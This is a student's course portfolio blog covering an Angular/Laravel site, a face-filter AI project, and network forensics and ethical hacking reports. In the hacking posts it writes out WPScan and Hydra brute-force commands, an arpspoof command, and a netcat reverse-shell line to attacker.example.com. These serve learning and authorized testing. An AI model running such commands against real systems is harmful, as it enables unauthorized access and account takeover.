Projects:

Intelligent Systems

http://2201797001chan.blog.binusian.org/category/projects/intelligent-systems/

Web Application

http://2201797001chan.blog.binusian.org/category/projects/web-application/

Multimedia

http://2201797001chan.blog.binusian.org/category/projects/multimedia/

Database System

http://2201797001chan.blog.binusian.org/category/projects/database-system/

Ethical Hacking

http://2201797001chan.blog.binusian.org/category/projects/ethical-hacking/

Network Forensics

http://2201797001chan.blog.binusian.org/category/projects/network-forensic/

Posted in Projects | Leave a comment

Attention!

All tools, guidance, and tutorials in this blog are for educational purposes only.

Posted in Ethical Hacking

Web Application Development & Security

Golden Leaf Residence Website

A website where residents can file complaints, book the swimming pool or function hall, and receive updates, all through a user-friendly interface.

The front-end service hosts the user interface of the app. It is built with the Angular framework and a Bootstrap template. To run it locally, run ng serve; to build the project, run ng build.
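
From a fresh checkout, the full front-end setup might look like this (a sketch assuming Node.js and npm are installed; the Angular version is not stated in the post):

```shell
# One-time setup: Angular CLI provides the ng command
npm install -g @angular/cli
git clone https://github.com/ChanElizabeth/frontend
cd frontend
npm install            # install the project's dependencies

# Development server at http://localhost:4200
ng serve

# Production build; output is written to dist/
ng build
```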

Front-end Source Code: https://github.com/ChanElizabeth/frontend

The back-end service contains the APIs used by the front-end service for basic CRUD, login, and logout. It is built with the Laravel framework and Passport authentication, with MySQL as the database. To run it locally, run php artisan serve.
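
From a fresh checkout, the back-end setup would look roughly like this (the migration and Passport steps are the standard Laravel/Passport ones, assumed rather than taken from the repository):

```shell
# One-time setup (assumes PHP, Composer, and MySQL are installed)
git clone https://github.com/ChanElizabeth/backend
cd backend
composer install                 # install Laravel dependencies

cp .env.example .env             # fill in the MySQL credentials here
php artisan key:generate         # generate the application key
php artisan migrate              # create the database tables
php artisan passport:install     # set up Passport's keys and clients

# Development server at http://localhost:8000
php artisan serve
```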

Back-end Source Code: https://github.com/ChanElizabeth/backend

Posted in Web Application

Intelligent System Final Project

By Chan Elizabeth W, Gadiza Namira Putri Andjani, and Winson Wardana

  • The main program code is in main.py.
  • The code for training the models is in the two Jupyter notebooks (trainimgModel.ipynb and trainemotionModel.ipynb).
  • haarcascade_frontalface_default.xml is used to detect the frontal face. It is a stump-based 24×24 discrete AdaBoost frontal face detector created by Rainer Lienhart.
  • shape_predictor_68_face_landmarks.dat is a pre-trained facial landmark detector from the dlib library, used to estimate the locations of 68 (x, y)-coordinates that map to facial structures on the face. The indexes of the 68 coordinates can be visualized in this image: https://www.pyimagesearch.com/wp-content/uploads/2017/04/facial_landmarks_68markup-1024×825.jpg
  • Eyefilter.py contains the code for coordinating and storing the eye positions from the dlib facial landmark detector. It is used to locate the person's eyes for the filter.
  • The Additional Pre-trained model folder contains our additional trained models: one for emotion detection and one for image classification.
  • The Filter folder contains the images that we used as face filters, applied based on the detected emotion.
  • The ImageTest folder contains images taken from Google that we used to test the model's image-classification predictions.
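
The eye-locating step in Eyefilter.py can be sketched as follows: in dlib's 68-point model, indexes 36-41 cover the left eye and 42-47 the right eye, so averaging those coordinates gives each eye's center. The landmark values below are made-up stand-ins for a real detector's output:

```python
# Sketch of locating eye centers from dlib's 68 facial landmarks.
# Indexes 36-41 are the left eye, 42-47 the right eye (0-based).
LEFT_EYE = range(36, 42)
RIGHT_EYE = range(42, 48)

def eye_centers(landmarks):
    """landmarks: list of 68 (x, y) tuples from the shape predictor."""
    def center(indexes):
        xs = [landmarks[i][0] for i in indexes]
        ys = [landmarks[i][1] for i in indexes]
        return (sum(xs) / len(xs), sum(ys) / len(ys))
    return center(LEFT_EYE), center(RIGHT_EYE)

# Dummy landmarks: every point at (0, 0) except the eye regions.
pts = [(0, 0)] * 68
for i in LEFT_EYE:
    pts[i] = (100 + i, 200)   # made-up left-eye coordinates
for i in RIGHT_EYE:
    pts[i] = (160 + i, 200)   # made-up right-eye coordinates

left, right = eye_centers(pts)
print(left, right)  # (138.5, 200.0) (204.5, 200.0)
```

With the real shape predictor, the filter image would then be anchored to these two center points.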

Source code: https://github.com/ChanElizabeth/IS-Final-Project

Posted in Intelligent Systems

Network Forensic Weekly Report

Week 1

This week, we were introduced to network forensics.

Network forensics is a division of digital forensics. It mainly focuses on monitoring and analyzing network traffic. Its purposes are:

  • Intrusion Detection/Prevention
  • Information Gathering
  • Legal Evidence

The differences between computer and network forensics:

Computer Forensics

  • Data changes little with daily usage
  • Evidence is contained within the file system
  • It is easy to perform a forensically sound acquisition
  • Seizing one or several computers would not make a deep impact on the business

Network Forensics

  • Data changes constantly
  • Evidence sometimes exists only in RAM
  • Most network devices do not have non-volatile storage
  • Seizing network devices would be problematic

We need network forensics as part of incident response to find out when an incident occurred, how long it lasted, what sensitive or confidential data was taken, how many systems were affected, and whether the incident is still ongoing. Network forensics is also needed to find the root cause of an incident and to collect evidence to bring attackers to justice.

The investigative methodologies of network forensics are OSCAR and TAARA. With these methodologies, investigators can perform network forensics and achieve investigation goals.

Posted in Network Forensic

Ethical Hacking Penetration Testing Final Project

Penetration testing target: pentest.id

The basic penetration testing process was used for this project, consisting of four phases: Discovery/Reconnaissance, Scanning, Exploitation, and Post-Exploitation (5 Important Questions to Ask Your Next Penetration Tester, 2015).

The main purposes of this testing:

  • Discover vulnerabilities using tools that reveal information visible only by enumerating the website with a black-box approach.
  • Attempt to break into the website using the vulnerabilities discovered.

The tools used for this testing:

Online platforms:

  • Pentest-Tools.com
  • Sucuri
  • UpGuard
  • Observatory 
  • Censys
  • Google

Kali Linux tools:

  • Nikto 
  • Whatweb
  • Nmap
  • Owasp Zap
  • Skipfish
  • Wpscan
  • Cupp
  • Metasploit

There were quite a lot of findings, but I cannot cover them all in this blog, so below I show only some of them, obtained with some of the tools mentioned above.

This was Observatory, one of the online platforms I used. It showed that certain security HTTP headers that keep the website safe were not implemented.
This was WPScan: we found private files exposed, namely robots.txt and readme.html.
We found the server software and its version, which was WordPress 4.7.3. We also found the theme used by the website, which was Longevity.
We identified the users of the website.

After obtaining valid usernames with the same tool, I tried to find the passwords using a brute-force attack, with the help of cupp to generate a list of possible passwords.

I entered information about the website owner when cupp asked for it, so that it could generate the possible passwords.
This is the command to run the brute force with the valid username that was identified.
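
In outline, the enumeration and brute-force commands looked like this (pentest.id was the authorized target; the username admin and the wordlist name are illustrative placeholders):

```shell
# Enumerate usernames on the target WordPress site
wpscan --url http://pentest.id --enumerate u

# Generate a password list interactively with cupp (it asks about the target)
python3 cupp.py -i

# Brute-force the login with an identified username and the generated wordlist
wpscan --url http://pentest.id --usernames admin --passwords wordlist.txt
```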

I also tried to brute force the FTP server using Metasploit.

It stopped attacking after the connection was lost.

We found these vulnerabilities on the website:

Due to outdated software (Pentest-Tools.com, 2020).

Due to missing HTTP headers (Content-Security-Policy, X-XSS-Protection, HSTS, X-Content-Type-Options, and X-Frame-Options), exposing the site to:

  • Cross-site scripting (XSS)
  • Clickjacking
  • MIME-sniffing downgrade attacks
  • SSL-stripping man-in-the-middle attacks
  • Weakened cookie-hijacking protections
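
For reference, these headers could be added in the site's web server configuration; a minimal nginx-style sketch (the directive values below are generic example policies, not ones taken from the assessment):

```nginx
add_header Content-Security-Policy "default-src 'self'";
add_header X-XSS-Protection "1; mode=block";
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains";
add_header X-Content-Type-Options "nosniff";
add_header X-Frame-Options "SAMEORIGIN";
```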

Unfortunately, I did not manage to break into the website, as I could not find the passwords for the identified usernames, and the XMLRPC denial-of-service attack failed to provide us with more valuable information or give us access to the website.

In conclusion, the risk is medium, as it is hard to break into the website. However, attackers may design attacks around the outdated server software, which is why it needs to be updated. The website's features and components are too easy to discover; this should be mitigated, for example by disabling features like wp-cron.php that may introduce vulnerabilities and by removing entries from exposed files like robots.txt. The owner also needs to implement the missing HTTP headers to avoid the vulnerabilities listed above.

References:

5 Important Questions to Ask Your Next Penetration Tester. (2015). Retrieved 18 June 2020, from https://blog.redcanari.com/2015/10/26/top-5-questions-to-ask-your-next-penetration-tester/

Pentest-Tools.com. (2020). Website Vulnerability Scanner Report (Light). Pentest-Tools.com.

Posted in Ethical Hacking

Ethical Hacking Weekly Report

Week 1

This week was our first meeting. We were introduced to the course. We were also informed about the projects that need to be completed to pass this course.

Week 2

This week, we learned about information gathering, including target scoping. The objectives of the week were to use web tools for footprinting, conduct competitive intelligence, and describe DNS zone transfers. We practiced with web tools such as Whois, Sam Spade, Dig, Host, and Paros.

Week 3

This week, we learned about utilizing search engines. The objectives of the week were to use Kali Linux tools to search the Internet and gather the necessary information about the target. We practiced Kali Linux tools such as theHarvester, Maltego, and Google dorks.

Week 4

This week, we learned about target discovery. We learned about port scanning, idle scans, IPID prediction, OS fingerprinting, and TCP/IP stack fingerprinting. We practiced with nmap and dnstrails.com this week. We also tried to find the real IP address behind the firewall.
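
Representative nmap invocations for what we practiced (scanme.nmap.org is nmap's official practice host; scanning any other system requires permission, and zombie_host is a placeholder):

```shell
# TCP SYN scan of the 1000 most common ports
nmap -sS scanme.nmap.org

# OS fingerprinting (TCP/IP stack fingerprinting); needs root
sudo nmap -O scanme.nmap.org

# Idle (zombie) scan via a third host, exploiting predictable IPID sequences
sudo nmap -sI zombie_host scanme.nmap.org
```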

Week 5

This week, we learned about target enumeration. We practiced it using nbtscan, netbios, net view, net use, DumpSec, Hyena, wpscan, and jooscan. We also reviewed tools from previous weeks, theHarvester and nmap.

Week 6

This week, we learned about vulnerability mapping. We learned different types of vulnerabilities. We practiced the mapping using Burp Suite.

Week 7

This week, we learned about the Social Engineering Toolkit (SET): what it is and how to install it. We learned and practiced one of the SET methods, the Credential Harvester, step by step. Then we did the given task, where we needed to explain another method step by step, along with its advantages and disadvantages. I chose the Web Jacking Attack Method.

Week 8

This week, we continued learning about social engineering. After recalling the previous weeks' topics, we again practiced the SET methods step by step.

Week 9

This week, we learned about target exploitation. We learned how to do vulnerability research and the skills it requires. Then, we explored several exploit websites. Finally, we practiced exploitation using Metasploit's exploit modules and also searchsploit.

Week 10

This week, we learned about privilege escalation and how to attack passwords. There are two types of password attacks: offline and online. In offline attacks, hackers need physical access to the machine to perform the attack, whereas an online attack can be done from a remote location. Tools used in offline attacks include John the Ripper and Ophcrack; tools used in online attacks include Hydra and Wireshark. We also learned about the network spoofing tools Arpspoof and Ettercap.
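
Typical invocations for the tools mentioned (the hash file, target host, and wordlist names below are placeholders, not ones from the class):

```shell
# Offline attack: crack password hashes copied from the target machine
john --wordlist=rockyou.txt hashes.txt

# Online attack: brute-force an SSH login from a remote location
hydra -l admin -P rockyou.txt ssh://target.example.com

# ARP spoofing: impersonate the gateway to a victim on interface eth0
sudo arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
```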

Week 11

This week, we learned about maintaining access. It is useful because we avoid reinventing the wheel when previous vulnerabilities get patched or the sysadmin hardens the system, and it saves time. However, keeping access after the penetration test is finished is unethical. To maintain access, we can create OS backdoors, tunnelling, and web-based backdoors. Example tools are Cymothoa, nc/netcat, WeBaCoo, and Weevely.
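
As a sketch of the simplest netcat backdoor (host and port are placeholders; the -e option exists only in netcat builds that support command execution, and this should only ever be done on systems you are authorized to test):

```shell
# On the attacker machine: listen for the incoming connection
nc -lvp 4444

# On the compromised machine: connect back and expose a shell
nc attacker.example.com 4444 -e /bin/bash
```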

Posted in Ethical Hacking

Ethical Hacking – Individual Assignment

The tool used – Sherlock

Sherlock is a tool that can be used to find social media accounts across a wide variety of websites that may be related to the real target. Each social media account may contain links to others that use different screen names, providing us with new information. Profile photos are easy to put into a reverse image search, allowing you to find other profiles using the same image whenever the target has a preferred profile photo.

The additional tool needed to make Sherlock work:

Python 3.6 or higher

Step-By-Step:

  1. Open Kali Linux and launch the terminal.

Installation:

  2. Clone the "sherlock" repository provided by the "sherlock-project". In the terminal, enter git clone https://github.com/sherlock-project/sherlock.git.
  3. After the clone finishes, enter the ls command to view the contents of the directory.
  4. The sherlock tool is now present in the directory; change the working directory to it by entering cd sherlock in the terminal.
  5. Install python3 and python3-pip if they are not installed (I already had them installed).
  6. Install the requirements by entering python3 -m pip install -r requirements.txt in the terminal.
Usage:

  1. In the terminal, enter python3 sherlock --help to view how to use the tool.
  2. Then, to run the tool and search for users in the terminal:
  • Enter "python3 sherlock {{username}}" to search for one user.

Example: python3 sherlock elizabethchan

  • Enter "python3 sherlock {{username username username}}" to search for more than one user.

Example: python3 sherlock elizabethchan elizabethw chanelizabeth

(Screenshots of the Sherlock search results.)

From the results of the search above, using my own username as the target, Sherlock successfully found my accounts on several websites, including Duolingo. I also got additional results for usernames belonging to people with similar names, which I could then look into.

Posted in Ethical Hacking

Intelligent Systems Weekly Report

Week 1

This week was the first session of the Intelligent Systems class. We had an introduction to AI. We also formed a group for the final project.


Week 2

This week, Diza and I started the research for the final project. We found multiple examples that gave us ideas for our final project.


Week 3

This week, we added Winson to our final project team. We have narrowed our options down to three project ideas: handwritten digit recognition, age & gender detection, and face filter software.


Week 4

This week, we studied AI games: game playing as search, the minimax algorithm, alpha-beta pruning, using heuristics and evaluation functions, non-deterministic games, and state-of-the-art game programs. I also kept searching for ideas for the face filter software.
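
The minimax algorithm with alpha-beta pruning can be sketched in a few lines; the game tree below is a made-up example where internal nodes alternate between the two players and leaves hold static evaluation scores:

```python
# Minimax with alpha-beta pruning over a simple nested-list game tree.
# Internal nodes are lists of children; leaves are evaluation scores.
def alphabeta(node, maximizing, alpha=float("-inf"), beta=float("inf")):
    if not isinstance(node, list):   # leaf: return its static evaluation
        return node
    if maximizing:
        value = float("-inf")
        for child in node:
            value = max(value, alphabeta(child, False, alpha, beta))
            alpha = max(alpha, value)
            if alpha >= beta:        # prune: the minimizer avoids this branch
                break
        return value
    else:
        value = float("inf")
        for child in node:
            value = min(value, alphabeta(child, True, alpha, beta))
            beta = min(beta, value)
            if alpha >= beta:        # prune: the maximizer avoids this branch
                break
        return value

# Maximizer at the root, minimizer one level down:
# left branch guarantees min(3, 5) = 3, right branch min(6, 9) = 6.
tree = [[3, 5], [6, 9]]
print(alphabeta(tree, True))  # 6
```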


Week 5

This week, we learned about supervised and unsupervised machine learning, and about obtaining and interpreting probabilities. We did an exercise on joint probability distributions, conditional probability, and the Naïve Bayes classifier.


Week 6

This week, we learned more about supervised and unsupervised machine learning. We also learned about different types of clustering techniques, including partitional and hierarchical algorithms. Then, we did an exercise on the K-Means algorithm and initial cluster centroids.
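
The K-Means idea from the exercise can be reproduced with a minimal 1-D implementation (the data points and initial centroids below are made up for illustration, not the class exercise itself):

```python
# Minimal K-Means on 1-D data: assign each point to the nearest centroid,
# then move each centroid to the mean of its cluster, until nothing changes.
def kmeans_1d(points, centroids, max_iter=100):
    for _ in range(max_iter):
        clusters = [[] for _ in centroids]
        for p in points:
            nearest = min(range(len(centroids)),
                          key=lambda i: abs(p - centroids[i]))
            clusters[nearest].append(p)
        new_centroids = [sum(c) / len(c) if c else centroids[i]
                         for i, c in enumerate(clusters)]
        if new_centroids == centroids:   # converged
            break
        centroids = new_centroids
    return centroids, clusters

points = [1, 2, 3, 10, 11, 12]
centroids, clusters = kmeans_1d(points, [1, 10])  # initial cluster centroids
print(centroids)  # [2.0, 11.0]
print(clusters)   # [[1, 2, 3], [10, 11, 12]]
```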


Week 7

This week, we learned about market basket analysis and different association rule algorithms. We learned the brute-force approach and the Apriori algorithm. Then, we did an exercise on the Apriori algorithm and had a quiz on what we had learned from weeks 1 to 7.
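
The Apriori exercise boils down to counting itemset support level by level and keeping only itemsets that meet a minimum support. A minimal sketch on made-up transactions (the candidate-generation step here is a simple brute-force join, less efficient than real Apriori pruning):

```python
from itertools import combinations

# Minimal Apriori: generate frequent itemsets level by level,
# keeping only those whose support meets the threshold.
def apriori(transactions, min_support):
    transactions = [frozenset(t) for t in transactions]
    items = {i for t in transactions for i in t}
    frequent, k = {}, 1
    current = [frozenset([i]) for i in sorted(items)]
    while current:
        # count support: how many transactions contain each candidate
        counts = {c: sum(c <= t for t in transactions) for c in current}
        survivors = {c: n for c, n in counts.items() if n >= min_support}
        frequent.update(survivors)
        # size k+1 candidates from the items that still appear (brute-force join)
        singles = {i for c in survivors for i in c}
        current = [frozenset(c) for c in combinations(sorted(singles), k + 1)]
        k += 1
    return frequent

baskets = [{"bread", "milk"}, {"bread", "butter"},
           {"bread", "milk", "butter"}, {"milk"}]
freq = apriori(baskets, min_support=2)
print(sorted(tuple(sorted(s)) for s in freq))
# [('bread',), ('bread', 'butter'), ('bread', 'milk'), ('butter',), ('milk',)]
```

{bread, milk} survives with support 2, while {butter, milk} appears in only one basket and is dropped.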

Posted in Intelligent Systems

My contribution to database system final project

I contributed to this project by making the staff and customer UI and controllers, making the main menu UI and functions with Marco, and making the ERD diagram. Together with the other group members, we wrote the project report.

Posted in Database System